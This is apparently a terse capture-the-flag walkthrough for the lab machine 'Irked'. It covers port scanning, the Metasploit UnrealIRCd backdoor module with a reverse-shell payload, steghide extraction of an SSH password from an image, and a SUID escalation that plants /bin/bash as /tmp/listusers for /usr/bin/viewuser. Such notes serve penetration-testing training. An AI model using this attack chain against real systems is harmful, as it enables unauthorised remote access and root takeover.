Irked 
==========

22/tcp    open   ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
6697/tcp  open   irc     UnrealIRCd (Admin email djmardov@irked.htb)
8067/tcp  open   irc     UnrealIRCd (Admin email djmardov@irked.htb)
58818/tcp open   status  1 (RPC #100024)
65534/tcp open   irc     UnrealIRCd (Admin email djmardov@irked.htb)

- http: Nur Bild "irked.jpg"
- MSF exploit/unix/irc/unreal_ircd_3281_backdoor
   => Port 65534
   => payload cmd/unix/reverse
- /home/djmardov/Documents/.backup
--------------------------------------------
   Super elite steg backup pw
   UPupDOWNdownLRlrBAbaSSss
--------------------------------------------
- wget http://irked.htb/irked.jpg   
- steghide info irked.jpg
  => embedded file "pass.txt"
- steghide extract -sf irked.jpg
  => pass.txt "Kab6h+m+bbp2J:HG"
  => SSH
  => ./Documents/user.txt
- SUID - Files: /usr/bin/viewuser
---------------------------------------
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-05-04 02:42 (:0)
djmardov pts/1        2020-05-04 03:27 (10.10.14.132)
sh: 1: /tmp/listusers: not found
----------------------------------------
- cp /bin/bash /tmp/listusers
- /usr/bin/viewuser
- /root/root.txt

